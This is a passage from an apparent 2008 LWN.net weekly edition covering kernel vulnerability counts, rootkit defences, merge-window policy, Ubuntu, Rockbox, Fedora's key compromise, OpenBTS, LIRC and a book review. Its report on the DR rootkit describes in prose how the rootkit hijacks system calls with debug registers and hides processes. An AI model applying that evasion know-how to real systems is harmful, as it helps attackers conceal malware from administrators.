from a vulnerable application are particularly powerful—thus
dangerous.  For some database installations, there is even a mode that will
get a 
shell prompt on the server as the user that runs the database application.


Because it is free software, sqlmap is very useful for understanding SQL
injections and, perhaps more importantly, what kinds of things an attacker
can do by abusing a vulnerable application.  There is excellent documentation,
both for developers and users.

Sqlmap recently released version 0.6 and is
certainly worth a look for anyone interested in testing a web application
or curious about SQL injection in general.


		Kernel security, year to date


Earlier this year, your editor asked a high-profile kernel developer, in a
public discussion at a conference, about the seemingly large number of
kernel-related security bugs.  Was the number of these vulnerabilities of
concern, and what was being done about it?  The answer that came back was
that security issues aren't a huge concern, that most of the reported
issues were obscure local exploits requiring the presence of specific
hardware.  Serious issues, like the vmsplice()
vulnerability, are rare.  

More recently, as part of the panic associated with getting a talk together
for the Linux Plumbers
Conference, your editor decided to take a closer look at kernel
vulnerabilities.  It turns out that there are, in fact, quite a few of
them.  The vulnerabilities which have been given CVE numbers in 2008 (so
far) are: 


That is 41 CVE numbers (so far) for 2008 - not a small number.  Fully 1/3
of these vulnerabilities were in the networking subsystem, which is scary:
this is the most likely place to find remotely-exploitable problems in the
kernel.  It is true that sites not running SCTP or DCCP can forget about
many of those, and IPv6 is responsible for a few of the rest, so most of
those vulnerabilities were not a concern for most sites. 


Many of the
remaining vulnerabilities were in the core kernel or in
architecture-specific code.
The number of vulnerabilities found in drivers - the part of the kernel
which has long been sneered at as containing the worst code - is actually
quite small.  On the other hand, four of the CVE-listed vulnerabilities
(the Xen, AppArmor, and utrace problems) 
were caused by out-of-tree code added by distributors.  There is no way to
know how many vulnerabilities were fixed without obtaining a CVE number - or
without even realizing that a vulnerability existed in the first place.

When a single program is responsible for this many vulnerabilities, it
makes sense to ask why.  The kernel, of course, is a very large program;
more code means more bugs, some of which will have security implications.
Beyond that, though, the kernel runs in a special, privileged environment.
Flaws which would simply be fixed as just-another-crash in a normal
application are denial-of-service vulnerabilities in the kernel - or
worse.  So a larger number of vulnerabilities in the kernel does not, by
itself, imply that the kernel's code is worse than that of other programs;
it only reflects the fact that the consequences of kernel bugs tend to be
more severe.


The discovery (and repair) of vulnerabilities does not necessarily imply
that our current process is creating a lot of vulnerabilities; it could be
that we are mostly fixing older problems.  If the developers are 
fixing vulnerabilities more quickly than they are adding more, life should
be good in the long run.  The vulnerabilities in the list above vary from
those which are very old (affecting 2.4 kernels too) to some which are very
new (the UVC driver was added in 2.6.26).  Some of them are in code which,
while being intended for the mainline, has not yet been merged.  It is
probably impossible to say whether security problems are being fixed more
quickly than they are being created, but one thing is clear: all of that
code flowing into the mainline is bringing a certain number of security
problems with it.

For that reason, it is a little discouraging that there is little work
being done in the kernel community with the explicit goal of improving the
security of the kernel. Few patches are reviewed with security issues in
mind; the vmsplice() vulnerability, as one example, was a clear
failure of the review process.  There are undoubtedly many people who are
doing fuzz testing and such - some of them are even the good guys - but
much of the formal testing going on seems aimed more at API conformance
than at security verification.  There must be more work going on behind the
scenes, but it is still hard to avoid a sense of a certain amount of
complacency with regard to security issues.


As a community, we take pride in the security of our system.  But one
vulnerability per week is not the most inspiring security record.  It would
be good to find a way to do better than that.  Better tools must be a part
of the solution, but more thorough code review is also needed.  There still
is no substitute for a pair of eyeballs looking for ways in which new code
might be subverted.  Asking for more security-oriented review seems
ambitious when code review is already one of the biggest bottlenecks in the
development process.  But the alternative would appear to be to continue to
add to our collection of CVE numbers.

		System calls and rootkits


A patch to add some security checks before making system calls would seem
like a reasonable addition to the kernel, but because it is, at best, a
half-measure, it received a less than enthusiastic response.  
Preventing rootkits—malware that alters the kernel to hide its
presence and function—from altering the system call table was the
rationale 
behind the patch, but it would only work for the current crop of
rootkits.  Once that change was made, rootkit authors would just change their
modus 
operandi in response.


There are many possible
ways that a root user—or malware running as root—can modify a
Linux system to run rootkit code. Some currently "popular" rootkits modify
the system call table, though it is ostensibly read-only.  Some commercial malware
scanners that run on Linux have also been known to use this technique.  In
both cases, certain system 
calls are re-routed from the standard kernel code to code that lives
elsewhere.  That code, running in kernel mode, can then do just about
anything it wants with the system.


Arjan van de Ven proposed a patch that hooked into the
system call entry code to check the
address of the call to ensure that it was within the addresses
occupied by kernel code.  He describes the change and its impact this way:

The patch below, while obviously not perfect protection against malware,
adds some cheap sanity checks to the syscall path to verify the
system call is actually still in the kernel code region and not some
external-to-this region such as a rootkit.

The overhead is very minimal; measured at 2 cycles or less.
(this is because the branches get predicted right and the rest of the
code is almost perfectly parallelizable... and an indirect function call
is a branch issue anyway)


Various kernel hackers pointed out the flaws inherent in that scheme.  As Andi
Kleen succinctly puts it:

This just means that the root kits will switch to patch
the first instruction of the entry points instead.
[...]
So the protection will be zero to minimal, but the overhead will
be there forever.


One of the more interesting ideas to come out of the discussion was Alan
Cox's thoughts on using a
hypervisor to enforce protections: 

The only place you can expect to make a difference here is in virtualised
environments by teaching KVM how to provide 'irrevocably read only' pages
to guests where the guest OS isn't permitted to change the rights back or
the virtual mapping of that page.


Ingo Molnar described a rather complicated
scheme that might increase the likelihood of a rootkit being detected, but
with a fairly high cost—in build complexity as well as the ability
to debug the resulting kernel.  The compiler would be changed to insert
calls to rootkit checks randomly throughout the kernel binary in ways that
would be 
difficult or impossible for a rootkit to detect and evade.  In the end,
though, a rootkit could simply install a new kernel that does exactly what
it wants, then cause, or wait for, a reboot.


Without some kind of hardware enforcement (e.g. Trusted
Platform Module) or locked-down virtualization, Linux is defenseless
against attacks that run as 
root.  The kernel could change to thwart a particular kind of attack, such
as van de Ven's patch, but other kinds of attacks will still succeed.  It
is clearly a situation where "the only way to win is not to play this
game", as Pavel Machek—amongst others—noted in the thread.


In the end, van de Ven wrote off the patch as an exercise in measuring the
cost of this kind of runtime checking.  It was fairly low cost solution,
but without any major upside.  The real upside was getting kernel hackers
thinking about the problem, which could lead to some better solutions
down the road.


		Tightening the merge window rules


The 2005 kernel summit
included a discussion on a recurring topic: how can the community produce
kernels with fewer bugs?  One of the problems which was identified in that
session was that significant changes were often being merged late in the
development cycle with the result that there was not enough time for
testing and bug fixing.  In response, the summit attendees proposed the
concept of the "merge window," a two-week period in which all major changes
for a given development cycle would be merged into the mainline.  Once the
merge window closed, only fixes would be welcome.

Three years later, the merge window is a well established mechanism.  Over
that time, the discipline associated with the merge window has gotten
stronger; it is now quite rare that significant changes go into the
mainline outside of the merge window.  The one notable exception is that
new drivers can be accepted later in the cycle, based on the reasoning that
a driver, being completely new and self-contained functionality, cannot
cause regressions.  Even then, there are hazards: the UVC webcam driver,
merged quite late in the 2.6.26 cycle (in 2.6.26-rc9), brought a security
hole with it.

The merge window rule is often expressed as "only fixes can go in after the
-rc1 release."  Recent discussions have made it clear, though, that Linus
is starting to develop a rather more restrictive view of how development
should go outside of the merge window.  The imminent 2008 kernel summit may
well find itself taking on this topic and making some changes to the rules.

In short, Linus has concluded that "fixes only" is not disciplined enough;
a lot of work characterized as a "fix" can, itself, be a source of new regressions.
So here's how Linus would like developers to
operate now:


Here's a simple rule of thumb:
	
 if it's not on the regression list
	 if it's not a reported security hole
	 if it's not on the reported oopses list
	
	then why are people sending it to me?


There can be no doubt that the tighter rules have come as a surprise to a
number of developers - if nothing else, the frequency with which Linus has
found himself getting grumpy with patch submitters makes that clear.

And, the truth of the matter is that Linus has not enforced anything like
the above rule in the past.  Beyond new drivers, post-merge-window changes
have typically included things like coding style and white space fixups,
minor feature enhancements, defconfig updates, documentation updates,
annotations for the sparse 
tool, and so on.  Relatively few of these changes come equipped with an
entry on the regression list.

To look at this another way, here's a table which appeared in the 2.6.26 development
statistics article, updated with 2.6.27 (to date) information:


* (Through September 9).


2.6.27 appears to be following the trend set by previous kernels: on the
order of 25% of the total changesets will be merged outside of the nominal
merge window.  The most recent 2.6.27 regression summary shows
a total of 150 regressions during this development cycle, of which 33 were
unresolved.  That suggests that at least 2300 patches merged since 2.6.27-rc1
were not fixes for listed regressions.

So the "regression fixes only" policy is truly new - and not really
effective yet.  Should this policy hold, it could have a number of
interesting implications including, perhaps, an increase in the number of
non-regression fixes shipped in distributor kernels.  It might make
developers become more diligent about reporting regressions so that the
associated fix can be merged.  With fewer changes going in later in the
cycle, development cycles might just get a little shorter, perhaps even to
the eight weeks that was, once, the nominal target.  And, of course, we
might just get kernel releases with fewer bugs, which would be a hard thing
to complain about.  In the short term, though, expect more grumpy emails to
developers who are still trying to work by the older rules.

		What's up with the Intrepid Ibex


Ubuntu's current development release is called the Intrepid Ibex, which is soon to
become v8.10.  The Alpha5 release was announced
this week, which is pretty close to on schedule.  One
more alpha release is planned, followed by a single beta, and the final
release should be available by October 30, 2008.

Looking at the blueprints for
Intrepid we see a number of high priority items such as 3G
networking, which will be integrated into NetworkManager.
Another high priority item is an improved
flash experience, which is
aimed at improving the plugin finder wizard, better interaction with
sites that use the flash detection kit, and an improved user-experience for
selecting available alternatives. Internally there are the Package
Status Pages, which are meant to provide a web page for each of the top
20-30 
packages in Ubuntu showing bug counts and other vital signs and
statistics.

What else is new in Intrepid?  GNOME 2.23.91, X.Org server
7.4, Linux kernel 2.6.27, and Network Manager 0.7 are all being included. 
An encrypted private
directory will also be added to each home directory.  In addition, there's a
Guest session available from the User Switcher panel applet to give
temporary access with restricted privileges.
  

Dynamic Kernel Module Support (DKMS) is also available in Intrepid.  It
allows kernel drivers to be automatically 
rebuilt when new kernels are released. This makes it possible for kernel
package updates to be made available immediately without waiting for
rebuilds of driver packages, and without third-party driver packages
becoming out of date.  Finally, the
"Last successful boot" recovery entry retains a copy of your running kernel
and makes it available from the boot loader.  This makes it possible for
old kernel packages to be safely auto-removed by the package manager,
instead of being kept indefinitely.

Kubuntu will be using KDE4, with no plans to support KDE3.  The Kubuntu wiki for
Intrepid says, "KDE 3 is obsolete and largely unmaintained. Keeping
with KDE 3 would offer no advantage over giving users Hardy."

Bug squashing has been ongoing, with a number of focused Hug Days.  The latest of
these will be held September 11 to focus on bugs
that don't have a package assigned to them.

There are still a few known
issues in the Alpha5 release, but overall the development is
progressing nicely.  Of course, if wild mountain goats are not
your thing (however intrepid they might be), you can always wait for the
more mythological Jaunty Jackalope, which
will be in the planning stages at a Ubuntu Developer Summit (UDS) in
Mountain View, 
California next December.

		Waiting for Rockbox 3.0 - again


Rockbox is a GPL-licensed replacement
firmware for a number of digital audio players.  LWN published an article on the imminent
Rockbox 3.0 release in May, 2006.  Well over two years later, it is
clear that some projects use a larger value of "imminent" than others.  In
this case, the Rockbox developers concluded that certain problems simply
were not going to be resolved in any reasonable 3.0 time frame; rather than
make a major release with known problems, they simply gave up on 3.0 at
that time.  As a result, the current stable Rockbox release is Rockbox 2.5,
from September, 2005.

It is probably safe to bet that few Rockbox users are running 2.5, which
only had support for a handful of Archos players.  Grabbing a daily build
is a fact of life in the Rockbox community.  Meanwhile, Rockbox has
performed a valuable service for Debian developers who would otherwise have
to struggle to find a project with longer release cycles than their own.

Perhaps that state of affairs is about to change.  Back in July, the
project announced that, once again, an
attempt was to be made for a 3.0 release.  On August 15, Rockbox went into feature freeze, with the 3.0 release
planned for "within a couple (as in two) weeks."  That, of course, was a
few (as in three) weeks ago, but this release is clearly getting closer.

Now would seem like the time for the project to begin its hype campaign
with lots of screenshot-heavy articles on all of the features this major
release will bring.  Evidently the Rockbox developers have some strange
ideas about actually working on the code, though; they haven't gotten
around to the promotional side of things yet.  So, while the Rockbox manual is reasonably
comprehensive and current, it's hard to come up with a list of changes for
the 3.0 release.

At the top of any list would have to be the list of supported players,
which has expanded considerably since the 2.5 release.  The Rockbox
buyer's guide gives a good summary of the currently-supported players.
Alas, none of these players are currently in production, though some can
still be found on auction sites and elsewhere.  There is progress toward
support for some more contemporary players; early successes have been
announced for the Cowon iAudio D2 and iAudio i7 devices.  Those players will
not be supported in the 3.0 release, of course, and the Rockbox developers
have reserved the right to withhold support for other players as well if it
is not stable enough.

Beyond that, changes to Rockbox in recent times include the ever-growing list
of codecs (including some video formats on suitable players), a
five-band parametric equalizer, an increasingly powerful theme capability
with many
user-contributed themes, album art display, a highly capable tag
database, Speex codec support for the
voice-based interface, and a whole host of new plugins including the
much-anticipated Lamp
plugin which displays a blank screen at full intensity, turning your
player into an expensive, short-lived flashlight.  Rockbox 3.0, it
seems, will have something for almost everybody.


[PULL QUOTE: 
Given
that installation can be a bit of a sweaty-palms experience overshadowed by
the fear of turning that nice, new player into a brick, any help which can
be given is more than welcome.
 END QUOTE]


It also appears that 3.0 may include the hard-to-find RBUtil program - a
Qt-based tool which automates the process of installing Rockbox.  Given
that installation can be a bit of a sweaty-palms experience overshadowed by
the fear of turning that nice, new player into a brick, any help which can
be given is more than welcome.  Bricks, after all, are not known for
high-fidelity sound.

Another recent event in the Rockbox community is the creation of the Rockbox
Steering Board, currently consisting of Daniel Stenberg, Linus Nielsen
Feltzing, Dave Chapman, Paul Louden, and Jens Arnold.  The mandate for this
board is not particularly clear; it seems to be intended to help break
deadlocks in technical discussions.  There have been some concerns raised that the creation of this
board is a sign that Rockbox is moving into a more bureaucratic,
slow-moving mode, but those worries are probably premature.

Rockbox developers also recently decided
that all of the project's code would be licensed as "GPLv2 or later."
While there is no plan for Rockbox to switch to GPLv3, the developers
wanted their code to be available to other projects which are using that
license.  Since Rockbox does not require copyright assignments, this change
will require an audit to find any GPLv2-only code and either relicense it
or remove it.  There have been no public announcements on how that process
is going.

The Rockbox project faces a number of challenges.  Cooperation from vendors
is essentially zero, so all ports require a reverse engineering effort.
Target platforms go through their market lifecycle quickly, making it
difficult to get a port stable before the target device disappears.  Its
programming environment is highly specialized and resource-constrained,
limiting the pool of developers who can work on the project.  And, someday,
the whole effort may lose its relevance as platforms become more capable
and it gets easier to just run Linux on them.  For now, though, there is
nothing better for those who want a dynamic and user-oriented operating
system for their digital audio player, and it continues to improve.

		Fedora distributes new keys


The Fedora project is back on track after its recent "infrastructure 
issues" with new package signing keys as well as packages and updates
signed with the new keys.  Fedora users should be able to pick up the new
key and update their systems now, with a minimum of hassle—just
verifying and 
accepting the new key.  But, no further information has been released about
exactly what went wrong, leading to more speculation and
some worry in the Fedora community.


When a user gets a package from their distribution—or, more likely, a
mirror of their distribution repository—they need to have some way to
determine that it is a valid package.  Distributors sign packages using a
private key; that signature can then be verified by using the
distribution's public key.  If the private key gets compromised somehow,
malicious packages could be created that would be indistinguishable from
the real versions.  This is why private signing keys must be well guarded,
usually by isolating them on separate machines and encrypting them with a
password. 


According to one of the announcements
about the problem, there is no evidence that the passphrase used to guard the
Fedora private signing key has been compromised, though the clear
implication is that the encrypted key file may have been captured.
Out of an abundance of
caution—and perhaps the concern that the passphrase might be guessed
or brute-forced—the project decided to generate new keys.  Along with
new keys come various headaches: re-signing all of the packages as well as
getting the keys installed on user's machines.


Getting the keys to users is largely a matter of getting the new
fedora-release package—along with PackageKit and friends for
GUI-enabled updates—installed.  That package contains the new key and
repository name (updates-newkey).  Of necessity, those updates are the last
that will be signed with the old key, so they will install on existing
Fedora systems.  Once that package makes its way out to the mirrors, users
can install it so that they can proceed with any needed updates using the
new key.


A yum clean metadata was helpful at the time of this writing to
accelerate the process; depending on which mirror is being used and when it
gets updated, that may not be needed.  After fedora-release is
installed, yum list updates gives a long list of updates
available, all signed with the new key.  All a user needs to do is verify
the key and add it to the RPM key database.  Verifying the key is a manual
step as a user must 
check its fingerprint against that published on the web site.  The
method described requires importing the key into gpg, then doing
gpg --fingerprint fedora@fedoraproject.org to see the key
fingerprint; this is clearly something that could be made easier.


As part of phase one of the re-signing, Fedora has re-signed all Fedora 8
and 9 package updates.  Phase two is ongoing, re-signing each package that
is distributed as part of the original release of Fedora 8 and 9.  Fedora
10 already has a new signing key as well.  From the perspective of a
possible compromise of the signing keys, things are well on their way back
to normal.  But there is still the nagging issue of how this all came about to
begin with.


Several different questions about the intrusion were directed at the Fedora
board from 
community members in their IRC meeting on
September 9.  Unfortunately, there was no new information forthcoming,
nor was there any indication of when that information might be available.
According to the board member Tom "spot" Callaway, information will be
released "when we're told that we can by the parties running the
investigation, not a second before, and not a second later." 


Red Hat is clearly holding all information about the intrusion as a closely
guarded secret—whether that is at the behest of law enforcement or
just lawyers is unclear.  While there was no timeline given, the clear
sense that one got from the meeting is that it might be weeks or months
before clearance will be granted to even confirm that they know how the
intrusion occurred. 
In addition, the Fedora board has not been officially briefed on the
incident; some members have knowledge because of their Red Hat
responsibilities, but the rest are in the dark.  If one needed a reminder
that Fedora is not an independent distribution, but instead is subject to
the whims of Red Hat, this is a clear demonstration. 


The justification for secrecy is that Red Hat is a publicly traded company
so intrusions into its systems need to be treated differently.  Some board
members believe that had there not been an intrusion into the servers that
handle packages for Red Hat Enterprise Linux—that is if it had only
been Fedora servers that were affected—the incident would have been
handled much more transparently.  Overall, the board is clearly unhappy
about the 
situation but, perhaps because they are almost all Red Hat employees, don't
see that there is much that can be done about it.  That too should serve as
a reminder.


It should be noted that Debian has had several server compromises over the
years (for example, 1 and 2), which is, perhaps, a poor
record of server security, but it is an excellent example of
transparency.  Debian is rather well known for its independence, which is
part of what allows it to be so open.  Those incidents do serve as
examples; perhaps they are not an exact fit for the current Fedora/RHEL
intrusion but that remains to be seen.


It may very well be that Red Hat is between a rock and a hard place here.
As a friend to free software, Red Hat is unparalleled, but once in a while
it shows that it is foremost a corporation with responsibilities to its
shareholders.  When those responsibilities conflict with the transparency
we have come to expect from free software projects—especially with
regard to security issues—that transparency must be set aside.  One
can argue that Red Hat is being overly protective of the
details—confirmation that they either know or do not know how the
intrusion occurred for example—but that argument really can't be made
until all the facts are known.  For that we must wait for the process to
run its course.


		The OpenBTS project creates a stand-alone cell phone network 


On September 3, 2008, Harvind Samra
announced
the new
OpenBTS project:


The Open BTS Project is an effort to construct an open-source Unix application that uses the
Universal Software Radio Peripheral 
(USRP) to present a

GSM air interface ("Um") to standard GSM handset and uses the
Asterisk software PBX
to connect calls. The combination of the ubiquitous GSM air interface with VoIP backhaul could form the basis of a new type of cellular network that could be deployed and operated at substantially lower cost than existing technologies in greenfields in the developing world.


OpenBTS is currently a work in progress, released components
(and the associated pile of telecom acronyms) include a
Gaussian minimum-shift keying (GMSK) radio modem
and interface code for the USRP hardware, GSM

forward error correction (FEC) coders and decoders, 
GSM L3 message serializers/deserializers, a hybrid GSM/SIP control
layer, and a partial

short message service (SMS) stack implementation.
There are plans for expanding the functionality of the
various components of the code.


The fairly short project
FAQ
notes a potential legal issue with a proposed workaround solution:
"Although the project founders have built a more complete GSM

BTS (base transceiver station), some of that code may be the subject of a legal dispute. While the authors deny any wrongdoing is this matter, it would still not be prudent to release all of the code in these circumstances... Hopefully, the incomplete parts can be replaced
quickly."


The OpenBTS developers ran a recent alpha-level

system field test
at the 2008 Burning Man
art/technology festival in the Nevada desert.
They applied for and received a temporary FCC license,
memorialized by

this poster, in order to keep everything legal with the licensing
authorities.  Around $7000 worth of

radio equipment was assembled.
To top it off, everything was powered by a small wind generator and
a 12V battery.


A WiFi backhaul connection was made to a nearby satellite ground
station to provide VoIP connectivity to the external world.
Some interesting technical problems were encountered, including
being flooded by connections from active cell phones that were
looking for connection points when the system was first activated.
Another issue discovered was a "security hole" involving unlimited
external long distance dialing.
After sorting through the various issues, the system was declared
operational.
Many in-system and external voice and text connections were
made, the alpha test was declared a success. 


The live field test resulted in exposing a lot of real-world problems
that led to numerous code improvements.  There's no doubt that
sitting in a tent in a hot and windy desert is a fairly
difficult environment to develop code in, but progress was made
nonetheless.
The OpenBTS project illustrates the kind of technical advances that
can be made by a small, but dedicated group of people using open-source
software and open hardware.


		LIRC delurks


The Linux Infrared Remote Control project
(LIRC) provides drivers for a number of infrared receivers and
transmitters.  It is, perhaps, most heavily used by people running MythTV
and similar packages; it would, after all, completely ruin the experience
to have to get up from the couch to change channels.  Despite their
established user base, and despite the fact that a number of distributors
ship the code, the LIRC drivers have never found their way
into the mainline kernel.  In more recent times, little effort has gone
into their development and maintenance; the link to "Caldera OpenLinux" on
the project's web site would seem to make that clear.


But LIRC is useful code, and, as is the case with most out-of-tree drivers,
most people would really rather see LIRC in the mainline kernel.  Merging
into the mainline got a step closer on September 9, when Jarod Wilson
posted a version of the LIRC
drivers for consideration.  Jarod, it seems, has been working (with
Janne Grunau) on these drivers for some months; in the process, they have
eliminated "tens of thousands" of complaints from the checkpatch.pl script
and cleaned up a number of things.


Even after that work, though, the LIRC drivers are clearly not yet up to
normal kernel standards.  Some very strange coding conventions are used in
places.  Many of the drivers have broken (or completely absent) locking.
Duplicated code abounds.  One driver has implemented a command parser in
its write() function.  Another driver is for hardware which
already has a different driver in the mainline.  And, importantly, these
drivers do not work with the input subsystem.


[PULL QUOTE: 
The LIRC
drivers would appear to strongly support the notion that out-of-tree code
is, almost by necessity, worse code.
 END QUOTE]


In the past, Linus Torvalds (and others) have argued for merging drivers as
soon as possible.  If the code is poor, its chances of being improved get
much higher once it's in the mainline and others can fix it.  The LIRC
drivers would appear to strongly support the notion that out-of-tree code
is, almost by necessity, worse code.  These drivers have been around for
almost a decade, have been packaged by distributors, and have been used by
large numbers of people.  Despite all of that, they contain a large number
of serious problems which have never been addressed.


Now that the drivers have been posted to the linux-kernel list, quite a few
of these problems are being pointed out; Jarod and Janne have been
responding to reviews and fixing the issues.  The "merge drivers early"
philosophy would argue for pushing LIRC into 2.6.28, even if serious problems
remain.  Presence in the mainline will raise the visibility of the code,
inspiring (one hopes) more developers to work on fixing it up.  Merging
LIRC will also free distributors from the need to create separate packages
for those drivers.


One important question will have to be addressed before merging LIRC can be
seriously considered, though: its user-space API.  Once LIRC is merged, its
user-space API will be set in stone, so any problems with that API need to
be resolved first.  LIRC, being out of the mainline, did not follow the
development of the input subsystem, so it does not behave like other input
drivers - even in-tree drivers for infrared remotes.  The use of an in-kernel
command-line parser in at least one driver is sure to raise eyebrows; that
sort of interaction should really be handled via ioctl() or sysfs.
All told, it is hard to imagine this code being merged until the API
problems have been resolved.


Changing the LIRC API will, of course, lead to problems of its own.  There
is user-space code which depends on the current API; any changes will break
that code.  The kernel community will certainly understand this problem,
but is unlikely to be swayed by it.  There are a number of risks associated
with maintaining production kernel code out of the mainline tree; one of
those risks is that your established APIs will not be accepted by the
kernel development community.  So an API change may simply be part of the
cost of getting LIRC into the mainline at this late date.


It should be a cost worth paying.  Once LIRC is in the mainline, interested
developers will work to continue to bring the code up to kernel standards.
The community will maintain it going forward.  All Linux users will get the
LIRC drivers with their kernel, with no need to deal with external
packages.  Getting there may be a bit frustrating for users of remotes and
(especially) for the developers who have taken on the task of getting this
code into the mainline.  But, once it's done, remotes will just be more
normal hardware, supported by the kernel like everything else.

		DR rootkit released under the GPL


A free software Linux rootkit has been announced with a number of
interesting features.  Its availability may, unfortunately, help lower the bar
for "script kiddies" and others, but it also provides a nice look into what
makes up a rootkit.  The rootkit, called DR for Debug Register, uses some
new techniques to evade 
detection, such that even a change recently proposed for inclusion in the
kernel would have missed it.


A rootkit is malware that typically hooks into the kernel to hide its
presence from administrators.  Usually, rootkits can hide their processes
from /proc, which in turn means ps won't see them, but
sophisticated rootkits do much more than that.  DR can also hide network
sockets and files in the filesystem that are associated with rootkit processes.
There are some benefits to this approach as
the announcement describes:

The major benefit of the DR rootkit is that all this happens
transparently to the end user. The children of a hidden process are also
automatically hidden. The sockets a hidden process creates are also
hidden. But if you are a hidden process, you can see hidden resources.
This makes the DR rootkit nicely manageable.


Unlike many rootkits, DR does not alter the system call table directly.
Instead it sets a hardware breakpoint for the syscall_call()
function which gets called whenever a system call is made.  When that
breakpoint is reached, a handler is set up to watch for an access to the
memory location where the specific system call's function pointer lives
(i.e. syscall_table[__NR_syscall]).  When the address is retrieved
from that location, the breakpoint substitutes the address of the code the
rootkit wants to run—the system call hook.


The system call hooks is where the work is done to evade detection.  By
hooking less than a dozen different calls, DR can hide its processes,
files, and sockets.  By creating a program that does an exec()
of a special filename—one that starts with
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"—one can set the "hidden" bit on the
process; spawning a shell or running some malware after the exec()
fails will cause those processes to no longer be visible to the rest of the
system. 


There are some limitations outlined in the announcement, the biggest of
which is that DR is implemented as a kernel module without any attempt to
hide its presence.  Doing an lsmod will show it clearly, but there
are other ways to detect it as well.  Fixing those are all are on the "to
do" list and 
won't take a very large effort to complete.


DR was created by  Immunity, Inc. as part of their
penetration testing efforts and has been released under the GPLv2.  It
contains roughly 1200 lines of well-documented code that should be of
interest to anyone curious about rootkits.  It is not the first rootkit
available with source code, Adore predates it by several
years and there are probably others, but it is an interesting—if a
bit scary—release. 


		Review: Intellectual Property and Open Source


Free software inevitably runs into the body of law known collectively as
"intellectual property."  Many developers do their best to avoid the legal
side of things whenever possible; others seem to like nothing better than
extended debates on the topic.  Regardless of one's own feelings in
the matter, the fact remains that the legal system exists, it affects our
lives, and that we can only be better off if we understand it.  To
that end, O'Reilly has published Intellectual
Property and Open Source by Van Lindberg.

The book starts off with a Lessig-like comparison between code intended for
computers and legal code.  The legal code base is not as clean as one might
like:


	It gets worse: every line of the legal code was written by
	committee, and almost every line of it has been patched by a
	later piece of legislation or modified by a court.  Indeed, IP law
	is rooted in a more than 200-year-old codebase.  Is it any wonder
	it's a mess?


Mr. Lindberg is clearly trying to write for programmers, so code-based
analogies abound.  Patents are like regular expressions - quite powerful in
the technologies they can match, but you never really know what they will
catch until you try them.  Patent documents are structured like ELF program
headers, and the patent system as a whole is a sort of memorization scheme
(we get a Python Fibonacci number generator as an example here).  Contracts
are like a distributed version control system - they let anybody create
their own, localized law.  And so on.


Roughly the first half of the core part of the book is dedicated to
explaining how the four main branches of intellectual property (patents,
copyright, trademarks, and trade secrets) work.  The chapter on the patent system notes
some of the problems with software patents (in particular, the 
industry's use of oral tradition  and the late recognition of software patents makes most prior
art invisible to investigators), but, to a great extent, it seems to be
written for people who want to obtain patents, rather than those who feel
the need to defend themselves against software patents.  It might have been
nice to get a treatment of the often-quoted idea that software developers
are better off not knowing about patents because that way they cannot be
accused of willful infringement, but that topic was not touched.  There is
also no talk of the Open Invention Network or any other efforts to protect
the community as a whole.


The copyright chapter is a reasonably thorough treatment of the subject
which notes how the scope of copyright has expanded over the years.
The current situation is compared to an "allow by default" security policy
where anything which can be said to have an expressive aspect gets
copyright protection by default.

Derivative works are discussed at length, leading to this interesting
observation:


	The copyright complexity of open source software systems is in
	large part due to the rules surrounding derivative works.  A large
	project like the Linux kernel has hundreds or thousands of
	authors...  As a result, nobody really owns the Linux
	kernel; the best description of its status is that it is owned
	jointly by its developers.


Just a few pages earlier, it is stated that joint ownership means that each
author has full rights over the entire work and can do just about anything
with it - like license it to others.  A finding that the kernel was a joint
work could lead to some unpleasant consequences; one hopes that Mr.
Lindberg is not really saying that could happen.


The book mentions the abstraction-filtration-comparison test used by some
courts to determine if one body of code is derived from another, but says
nothing about how that test works.  It would have been nice to learn a bit
more, since that is an important part of how copyright cases are resolved
in the US.  Also nice would have been some discussion of the value of
registration of copyrights.

The chapter finishes with this discouraging note:


	Under a legal realist analysis, any use of copyrighted material
	that was objectionable or questionable would be struck down as
	infringing.  Non-objectionable use of copyrighted material would be
	allowed only if the political and economic interests in support of
	the use were more powerful than the political and economic
	interests against the use.  Unfortunately, this is, in my opinion,
	the best guide to the outcome of any future copyright case.


The discussion of trademarks (compared to desktop shortcut icons) is pretty
much as one would expect.  The chapter is more concerned with obtaining and
defending trademarks than balancing trademarks against the ideals of free
software.  There is not much to say about trade secrets, though the chapter
does touch on what happens if unreleased code is incorporated into a free
application.   The author concludes that the open development process makes
this kind of contamination less likely than with proprietary projects.

Next we move into a chapter on contracts and licenses which talks mostly
about how contracts are formed and enforced.  The book takes a strong
position that all licenses are contracts; they are just a special form of
contract which grants permission to use some sort of intellectual
property.  The other point of view (that licenses are distinct from
contracts) is touched upon, but dismissed this way:


	The "pure license" interpretation favored by Eben Moglen makes the
	enforcement of the GPL much easier, there is no need to consider
	offers, or acceptances, or the other particulars of contract law
	discussed in this chapter.  Unfortunately, it is impossible to say
	for certain if a particular agreement will be considered a license,
	a contract, or considered both a contract and a license.  It is a
	tricky and case-specific question focused on whether the agreement
	includes a "restriction on the scope" of permissible action or
	whether it is simply a "covenant" to act in a certain way.


Later on, the author refers to the GPL in particular as a
"Schrödinger's license" with a currently undetermined nature; it might
be "just a license" after all.  Clearly
there is some confusion on this point.  It is worth noting that the book
predates the appeals court decision in the JMRI
case, which makes the "it's a license" interpretation far more likely.


There is a chapter on the "economic and legal foundations of open source,"
talking about how the community works and, in particular, how free licenses
work.  There is little here which would be new to most LWN readers, but it
might be good to hand to the corporate legal office.  Speaking of that
office, the next chapter talks about how to contribute to a project without
getting into trouble with your employer.  There is talk about proprietary
information agreements, some important cases (including the Medsphere case,
which you editor wishes had been more prominent on his radar), works for
hire, and so on.  The key advice from the author is to disclose your work
and your ideas to your employer as soon as possible - preferably before
beginning employment.  This is a chapter that many free software developers
should read.

Chapter 10 is about choosing a license for a free software project.  The
importance of the topic is stressed - as is the importance of not trying to
write one's own license.  The author recommends that most projects should
limit themselves to considering the 2-clause BSD license, the Apache
license (v2), the Mozilla Public License, the GPL or LGPL (versions 2 or 3,
though GPLv3 is said to be "a better and surer foundation for future
development"), or the Open Software License (v3).

Chapter 11 is about the issues involved in accepting patches from others.
The author strongly recommends using some sort of signed contributor
agreement or even copyright assignments.  Getting assignments, he says,
allows for "unified legal control," ease of relicensing, and the ability to
do commercial licensing.  It's probably good advice for a strongly
corporate-controlled project, but may not fit with more community-oriented
projects.  Unfortunately, the book perpetuates this
particular fiction:


	In order to represent a code base against legal challenges, a
	single entity must have copyright ownership of all the code in that
	project.


And, to make it worse:
	

	A good example of this is the BusyBox project...  When people found
	out that BusyBox was being distributed in proprietary products
	without adherence to the license restrictions, the Software Freedom
	Law Center (SFLC) was able to file suit on behalf of the project
	because there were only two people that owned all the copyrighted
	code.


